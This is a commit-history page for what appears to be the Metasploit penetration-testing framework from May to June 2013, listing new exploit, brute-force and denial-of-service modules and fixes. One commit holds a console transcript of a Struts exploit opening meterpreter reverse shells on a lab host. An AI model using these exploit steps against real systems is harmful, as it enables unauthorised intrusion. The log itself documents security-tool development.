Commit Graph

9488 Commits (97ab9fa8df077128921ea368e5ad6f79e35cdd44)

Author SHA1 Message Date
jvazquez-r7 5240c6e164 Add module for MS13-037 CVE-2013-2551 2013-06-12 07:37:57 -05:00
Joe Vennix 45da645717 Update ff svg exploit description to be more accurate. 2013-06-11 12:12:18 -05:00
sinn3r 2874aead2e Land #1938 - Change sevone_enum because it's an Scanner 2013-06-11 11:42:18 -05:00
jvazquez-r7 0578572d98 Change sevone_enum because it's an Scanner 2013-06-11 08:51:15 -05:00
sinn3r 081baad68c Remove variable 'overflow' because it's not used
The 'overflow' variable isn't needed
2013-06-11 02:26:45 -05:00
Ruslaideemin 4e41e871bb mozilla_reduceright.rb - fix regex error.
[] is character class, and will match on 1, 6, 7, and |.
Where as (16|17) will match on either 16, or 17.

irb(main):053:0> y = /Firefox\/3\.6\.[16|17]/
=> /Firefox\/3\.6\.[16|17]/
irb(main):054:0> x = "Firefox/3.6.13"
=> "Firefox/3.6.13"
irb(main):055:0> x =~ y
=> 0
irb(main):056:0> y = /Firefox\/3\.6\.(16|17)/
=> /Firefox\/3\.6\.(16|17)/
irb(main):057:0> x =~ y
=> nil
2013-06-11 11:52:27 +10:00
Ruslaideemin 996171b35f mozilla_mchannel.rb undefined agent variable
If the TARGET is chosen instead of using the default
automatic, the agent variable will be undefined, which
causes the exploit to fail.
2013-06-11 10:43:47 +10:00
Ruslaideemin d91b412661 adobe_flash_sps.rb - resource_uri vs get_resource
resource_uri will randomize the returned uri unless
datastore['URIPATH"] is set.

get_resource will return the currently used reosurce_uri

Since the incorrect type is used, this exploit is completely broken.

Tested fix with both URIPATH set to / and unset, and it works after
redirect.
2013-06-11 07:13:02 +10:00
sinn3r 5b61f99ee6 Land #1933 - Update smart_hashdump Regular Expressions for Win 8 & 2012 2013-06-10 13:28:04 -05:00
jvazquez-r7 0c6dbe9885 Add final cleanup for sevone_enum 2013-06-10 13:16:22 -05:00
jvazquez-r7 6765a911a4 Land #1921, @juushya brute force login module for SevOne 2013-06-10 13:15:14 -05:00
sinn3r 622dc27d95 Land #1925 - fix SNMP enum module failing to catch some fail cases
[FixRM:#7945]
2013-06-10 12:51:02 -05:00
KarnGaneshen 72a9c8612b setting rfcode_reader_enum straight. more updates. 2013-06-10 22:57:00 +05:30
KarnGaneshen 5c988d99fe more updates to sevone.rb. hopefully all is covered.. 2013-06-10 21:59:18 +05:30
sinn3r 0895184e1f Land #1932 - Actually support OUTPUTPATH datastore option 2013-06-10 11:22:28 -05:00
KarnGaneshen 04171c46ec more updates to sevone.rb. hopefully all is covered. 2013-06-10 21:47:56 +05:30
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 3fbbe3e7b3 Make msftidy happy 2013-06-10 08:16:15 -05:00
jvazquez-r7 3c05cf4382 Land #1842, @viris DoS module for cve-2013-0229 2013-06-10 08:15:45 -05:00
Dejan Lukan 154894bda6 Added comments and merged jvazquez-r7-miniupnp_dos_clean branch. 2013-06-10 10:18:26 +02:00
Carlos Perez a9df55c27a Add Windows 2012 to regex matching 2013-06-09 20:46:44 -04:00
Carlos Perez 8e83f0ee30 Add Windows 8 and 2012 to regex matching 2013-06-09 20:41:46 -04:00
Ruslaideemin cd64e3593c Fix UltraISO file creation
This makes file creation where datastore['FILENAME'] is not used when
a different filename is required, and ends up creating files in the
wrong place.
2013-06-09 12:37:34 +10:00
Ruslaideemin c6b4290fea Fix UltraISO Exploit File Creation
Both ultraiso_ccd.rb and ultraiso_cue.rb use File.open to create
files, instead of using the create_file() function. This leads
to files being created in the wrong directory.

We work around this by dynamically changing the
file_format_filename function to return the corrected filename.
2013-06-09 09:51:15 +10:00
Ruslaideemin cb79aa252a Fix output path in ms10_004_textbytesatom.rb
ms10_004_textbytesatom.rb does not write to the local data directory,
instead it writes to the metasploit path (at least, that's where I
started msfrpcd).

This fixes it by using Msf::Config.local_directory
2013-06-09 07:28:48 +10:00
sinn3r f55edac0ca Title and description update 2013-06-07 22:38:53 -05:00
sinn3r a510084f1c Description change. 2013-06-07 22:35:46 -05:00
jvazquez-r7 600494817d Fix typo and target name 2013-06-07 21:08:38 -05:00
jvazquez-r7 9025b52951 make the payload build more clear 2013-06-07 18:05:11 -05:00
jvazquez-r7 d76e14fc9c Add module for OSVDB 93004 - Exim Dovect exec 2013-06-07 17:59:04 -05:00
Karn Ganeshen ffa18d413f Updated rfcode_reader_enum.rb ...
Updated as per review comments. 
Removed loot of network configuration.
Used JSON.parse to bring cleaner loot output
Changed some print_goods to vprint_status
Changed if not to unless
2013-06-08 03:21:43 +05:30
Karn Ganeshen 74bddcf339 Update sevone_enum.rb
New updates as per review comments
2013-06-08 02:28:09 +05:30
sinn3r aefcc51704 Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488) 2013-06-07 15:12:09 -05:00
Karn Ganeshen 1ca8fd2cf1 Update sevone_enum.rb
Updated as per initial review comments.
2013-06-08 01:14:43 +05:30
Karn Ganeshen eb0ae6ed27 Update rfcode_reader_enum.rb
Updated as per review comments
2013-06-08 01:00:18 +05:30
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
Thomas Ring 2bb0bd504c Makign changes recommended in redmine 7945 to fix SNMP enum module failing to catch some fail cases 2013-06-07 13:55:59 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
Karn Ganeshen 6b8e6b3f0c Create rfcode_reader_enum.rb
Adding new aux - RFCode Reader Web interface Login Brute Force & Config Capture Utility
2013-06-07 23:53:09 +05:30
Karn Ganeshen fcc600aa3e Create sevone_enum.rb
Adding new aux - SevOne Network Performance Management System application version enumeration and brute force login Utility
2013-06-07 23:39:22 +05:30
jvazquez-r7 a157e65802 Land #1916, @wchen-r7's exploit for Synactics PDF 2013-06-07 12:11:45 -05:00
sinn3r ea2895ac13 Change to AverageRanking
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
2013-06-07 12:08:51 -05:00
sinn3r 9c7b446532 Updates description about default browser setting 2013-06-07 11:58:31 -05:00
James Lee 0302437c2b Land #1915, smtp user enumeration enhancements 2013-06-07 11:42:41 -05:00
sinn3r f3421f2c3a Fix different landings 2013-06-07 10:26:04 -05:00
sinn3r da4b18c6a1 [FixRM:#8012] - Fix message data type to int
This patch makes sure s.message is actually an int, that way we can
properly stop or enable the service.
2013-06-06 23:49:14 -05:00
sinn3r e559824dc8 Remove whitespace 2013-06-06 20:08:50 -05:00
sinn3r d3e57ffc46 Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx.  When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
2013-06-06 20:05:08 -05:00
Thomas Ring 8cf5b548c3 make recommended changes 2013-06-06 14:23:25 -05:00
Thomas Ring 067899341e fix a number of issues with the existing module (slowness, false positives, false negatives, stack traces, enumering unix users on windows systems, etc) 2013-06-06 13:26:04 -05:00
jvazquez-r7 ec52795182 Clean for miniupnp_dos.rb 2013-06-06 11:19:26 -05:00
Steve Tornio 4d26299de3 add osvdb ref 93881 and edb ref 21191 2013-06-05 18:57:33 -05:00
William Vu 1596fb478a Land #1886, awk bind shell 2013-06-05 09:05:37 -05:00
William Vu 8ffa4ac9ac Land #1885, awk reverse shell 2013-06-05 09:04:49 -05:00
Roberto Soares Espreto f6977c41c3 Modifications done in each PR. 2013-06-05 07:55:05 -03:00
Roberto Soares Espreto b20401ca8c Modifications done in each PR. 2013-06-05 07:51:10 -03:00
sinn3r 6d3dcf0cef Land #1912 - Fixed check for Admins SID in whoami /group output 2013-06-05 02:55:38 -05:00
sinn3r a3b25fd7c9 Land #1909 - Novell Zenworks Mobile Device Managment exploit & auxiliary 2013-06-05 02:45:45 -05:00
sinn3r 307773b6a1 Extra space - die! 2013-06-05 02:44:56 -05:00
sinn3r 0c1d46c465 Add more references 2013-06-05 02:43:43 -05:00
sinn3r 46aa6d38f8 Add a check for it 2013-06-05 02:41:03 -05:00
sinn3r a270d37306 Take apart the version detection code 2013-06-05 02:34:35 -05:00
sinn3r 25fe03b981 People like this format better: IP:PORT - Message 2013-06-05 02:26:18 -05:00
sinn3r 02e29fff66 Make msftidy happy 2013-06-05 02:25:08 -05:00
sinn3r 35459f2657 Small name change, don't mind me 2013-06-05 02:18:11 -05:00
sinn3r 227fa4d779 Homie needs a default target 2013-06-05 02:16:59 -05:00
sinn3r 5d90c6cd71 Make msftidy happy 2013-06-05 02:11:23 -05:00
sinn3r ca5155f01d Final touchup novell_mdm_creds 2013-06-05 02:08:55 -05:00
sinn3r a5a3f40394 Report auth info 2013-06-05 02:06:32 -05:00
Roberto Soares Espreto 34243165c5 Some changes with improvements. 2013-06-04 21:22:10 -03:00
Roberto Soares Espreto e2988727fb Some changes with improvements. 2013-06-04 21:10:51 -03:00
cbgabriel 1032663cd4 Fixed check for Administrators SID in whoami /group output 2013-06-04 18:34:06 -04:00
sinn3r e70221a993 Land #1903 - Add decryptioin for firefox_creds 2013-06-04 11:38:03 -05:00
sinn3r cb31772302 Fix indent 2013-06-04 11:37:16 -05:00
steponequit ed4766dc46 initial commit of novell mdm modules 2013-06-04 09:20:10 -07:00
jvazquez-r7 3111013991 Minor cleanup for miniupnpd_soap_bof 2013-06-04 08:53:52 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
Dejan Lukan 2fe704ce38 Deleted undeeded comments and spaces. 2013-06-04 09:00:53 +02:00
Dejan Lukan 8ced3483de Deleted some undeeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯in `call'
lib/msf/core/thread_manager.rb💯in `block in spawn'

Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7 30a019e422 Land #1891, @wchen-r7's improve for ie_cgenericelement_uaf 2013-06-03 15:35:43 -05:00
William Vu 055e0a222c Land #1902, OSVDB reference for memcached 2013-06-03 14:57:43 -05:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
sinn3r b087951118 Add OSVDB reference 92867 for Memcached DoS module 2013-06-03 12:41:33 -05:00
sinn3r 116e2bb418 Landing #1782 - Added Memcached Remote Denial of Service module 2013-06-03 12:30:37 -05:00
sinn3r 3d9dcbf5bd Add a check to see if the host is down 2013-06-03 12:26:57 -05:00
xard4s 423a33b1fc Added firefox pw decryption support 2013-06-03 13:13:59 -04:00
sinn3r c705928052 Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb 2013-06-03 10:40:31 -05:00
Steve Tornio 76faba60b7 add osvdb ref 85462 2013-06-03 06:16:43 -05:00
Steve Tornio e612a3d017 add osvdb ref 77183 2013-06-03 05:42:56 -05:00
Dejan Lukan 217b263af7 Moved the module to different location and make it msftidy.rb compliant. 2013-06-03 10:35:10 +02:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
sinn3r e74c1d957f Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb 2013-06-03 02:15:35 -05:00
sinn3r 093830d725 Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb 2013-06-03 02:13:34 -05:00
sinn3r 57f9cc3643 Landing #1895 - Add OSVDB ref 56992 for sock_sendpage.rb 2013-06-03 02:12:23 -05:00
Steve Tornio c2c630c338 add osvdb ref 93444 2013-06-02 21:03:44 -05:00
Steve Tornio bc993b76fc add osvdb ref 82925 2013-06-02 20:43:16 -05:00
Steve Tornio ae17e9f7b5 add osvdb ref 56992 2013-06-02 18:32:46 -05:00
CG 571b62d19d svn scanner added print_good and rport 2013-06-02 18:05:11 -04:00
sinn3r cb33c5685f Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability 2013-06-02 12:35:40 -05:00
Steve Tornio 61c8861fcf add osvdb ref 2013-06-02 08:33:42 -05:00
sinn3r cc951e3412 Modifies the exploit a little for better stability
This patch makes sure the LFH is enabled before the CGenericElement
object is created.  Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
jvazquez-r7 1917961904 Land #1888, @swtornio's update for OSVDB references 2013-06-01 16:36:59 -05:00
jvazquez-r7 5939ca8ce4 Add analysis at the end of the module 2013-06-01 15:59:17 -05:00
jvazquez-r7 9be8971bb0 Add module for ZDI-13-094 2013-06-01 15:44:01 -05:00
Steve Tornio 8671ae9de7 add osvdb ref 2013-06-01 14:27:50 -05:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 f8e9535c39 Add ZDI reference 2013-05-31 20:50:53 -05:00
sinn3r d679946b7f Landing #1713 - add_sub encoder for x86 payloads 2013-05-31 18:49:08 -05:00
sinn3r 2ac0d25413 Fixes e-mail format, also a whitespace 2013-05-31 18:47:46 -05:00
Bruno Morisson d318c1cd22 included feedback 2013-06-01 00:31:06 +01:00
Roberto Soares Espreto d9609fb03e Was breaking with repeated commands 2013-05-31 18:44:48 -03:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
sinn3r e99401ea82 Landing #1817 - couchdb login module 2013-05-31 16:04:10 -05:00
sinn3r a88321c700 Final touchup 2013-05-31 16:03:30 -05:00
sinn3r 483b5e204f Missing the header 2013-05-31 16:00:36 -05:00
sinn3r e398025a7f I don't think what fails really matters. 2013-05-31 15:59:40 -05:00
James Lee 4f6d80c813 Land #1804, user-settable filename for psexec 2013-05-31 13:34:52 -05:00
James Lee 5964d36c40 Fix a syntax error
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
Tod Beardsley 9c771435f2 Touchup on author credit 2013-05-30 16:13:40 -05:00
Tod Beardsley dc014ede36 Land #1821, x64_reverse_https payload 2013-05-30 16:09:33 -05:00
jvazquez-r7 d0489b5d1e Delete some commas 2013-05-30 14:25:53 -05:00
jvazquez-r7 6abb591428 Do minor cleanup for lianja_db_net 2013-05-30 14:25:05 -05:00
jvazquez-r7 38e5c2bed2 Land #1877, @zeroSteiner's exploit for Lianja SQL 2013-05-30 14:23:45 -05:00
Tod Beardsley 67128a3841 Land #1821, x64_reverse_https stagers 2013-05-30 13:55:13 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre 70e1379338 Use msvcrt in ropdb for stability. 2013-05-30 11:13:22 -04:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Bruno Morisson d03379f1c6 changed 2 vprint_error to print_error 2013-05-30 11:54:42 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
Roberto Soares Espreto 00debd01c6 Listen for a connection and spawn a command shell via AWK 2013-05-29 21:22:49 -03:00
Roberto Soares Espreto d4a864c29f Creates an interactive shell via AWK (reverse) 2013-05-29 21:19:08 -03:00
Roberto Soares Espreto 07203568bd Performed changes to the correct operation of the module. 2013-05-29 20:50:28 -03:00
jvazquez-r7 07c99f821e Land #1879, @dcbz ARM stagers 2013-05-29 17:43:37 -05:00
Bruno Morisson 612eabd21a added sap_router_portscanner module 2013-05-29 23:36:53 +01:00
jvazquez-r7 f76a50ae38 Land #1881, @todb's fix for Redmine Bug 7991 2013-05-29 16:17:18 -05:00
Tod Beardsley e7a1f06fbc Modules shouldn't be +x 2013-05-29 15:11:35 -05:00
jvazquez-r7 7c41e239b4 Fix author name 2013-05-29 14:19:10 -05:00
jvazquez-r7 52aae8e04c Add small fixes for stagers 2013-05-29 14:01:59 -05:00
Tod Beardsley 10d8bebe73 Start with a random username to test 401 codes
SeeRM #7991

While this fixes the specific case of tomcat_mgr_login, it doesn't
address the general case where modules are attempting to test code 401
responses in order to determine if bruteforcing should continue.
2013-05-29 12:36:28 -05:00
Samuel Huckins f0e3b0c124 Merge pull request #1836 from dmaloney-r7/bug/anyuser_anypass_http
Verified MSF specs passing, Pro on develop functional tests working (ran Bruteforce, saw normal and verbose output concerning that bruteforce was skipped for such a case and why, verified no cred saved with 'anyuser' user).
2013-05-29 07:44:18 -07:00
Console 7c38324b76 Considered using the bourne stager.
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre c3ab1ed2a5 Exploit module for Lianja SQL 1.0.0RC5.1 2013-05-29 08:48:41 -04:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post.
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
dcbz 2c0f0f5f04 Changed reverse payload as suggested. 2013-05-28 21:52:16 -05:00
dcbz 07c3565e3c Made changes as suggested, forgot to remove exit() after testing was complete. 2013-05-28 21:31:36 -05:00
sinn3r ed5b8895bb Fixes smart_migrate for a TypeError bug
Bug is: TypeError can't convert Rex::RuntimeError into String

[SeeRM: #7984]
2013-05-28 18:45:49 -05:00
sinn3r 63694a6c87 Landing #1875 - Also remove *.ts.rb files 2013-05-28 17:29:02 -05:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
Tod Beardsley 14c4dbcf8c Also remove *.ts.rb files
On the heels of #1862, this gets rid of the "test suites" that bound
together all the old unit tests.
2013-05-28 17:05:44 -05:00
jvazquez-r7 a486fff9a4 Land #1872, @wchen-r7's improvement of cold_fusion_version 2013-05-28 16:35:45 -05:00
jvazquez-r7 96888455a7 Add new signature for CF9 2013-05-28 16:04:08 -05:00
James Lee f3ff5b5205 Factorize and remove includes
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
sinn3r deea66b76f Landing #1871 - fix an undefined variable bug in the DTP module 2013-05-28 15:13:20 -05:00
sinn3r b9969a8b2b Landing #1855 - Updates for coldfusion_pwd_props for CF9 by ringt 2013-05-28 14:43:09 -05:00
sinn3r 0ecffea66f Updates fingerprint() for CF10 2013-05-28 14:42:11 -05:00
sinn3r a6a46f82bb Updates the description a little bit 2013-05-28 14:31:56 -05:00
sinn3r e4e5edc619 Looks like we don't need to check MD5, let's keep it that way then. 2013-05-28 14:31:15 -05:00
sinn3r 8ab90e657c Adds a check for Cold Fusion 10 2013-05-28 14:21:29 -05:00
Spencer McIntyre 3857507d73 fix an undefined variable bug in the DTP module 2013-05-28 14:52:58 -04:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r d16d316658 Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r 73aa14cb91 Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946) 2013-05-28 11:02:21 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
Matt Andreko 5695994432 Added module to enumerate Canon printer Wifi settings 2013-05-27 18:02:37 -04:00
jvazquez-r7 e678b2c5d8 Add module for CVE-2012-5946 2013-05-26 00:21:20 -05:00
darknight007 57b7e4ec44 Update ms11_006_createsizeddibsection.rb 2013-05-25 13:14:41 +06:00
darknight007 6f2ddb3704 Update mssql_findandsampledata.rb 2013-05-25 11:33:57 +05:00
sinn3r e169ccab4f Landing #1862 - Remove inline unit tests 2013-05-23 22:19:29 -05:00
Matt Andreko ea7805d3c8 Fixed a bug in the HSTS module around null headers 2013-05-23 15:02:39 -04:00
Tod Beardsley 05916c079e Inline unit tests are so last decade
Aside from codebase-wide changes, nearly all of these tests haven't been
touched since before 2010, and there is no effort to maintain this style
of testing. We've moved on to (correctly) seperating out our tests from
our codebase.
2013-05-23 12:41:14 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r 8680aa8952 Landing #1857 - MS12-020 off-by-one fix 2013-05-22 22:57:08 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
jvazquez-r7 bfcd86022d Add code cleanup for nginx_chunked_size. 2013-05-22 14:37:42 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
LinuxGeek247 81b690ae4b Initial check in of nginx module 2013-05-22 13:52:00 -04:00
sinn3r ecb9d1d7fa Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X 2013-05-22 12:24:42 -05:00
John Sherwood d028f52dbd Fix broken ms12-020 vulnerability detection
The previous version of the script had an off-by-one error that prevented
proper detection of the vulnerability.  Changes made in this revision
include:

 - Correction of the off-by-one error
 - Use of match instead of == to check for valid RDP connection
 - Change of the channel requests to use IDs actually provided by
   the responses from the server
2013-05-22 00:08:25 -04:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00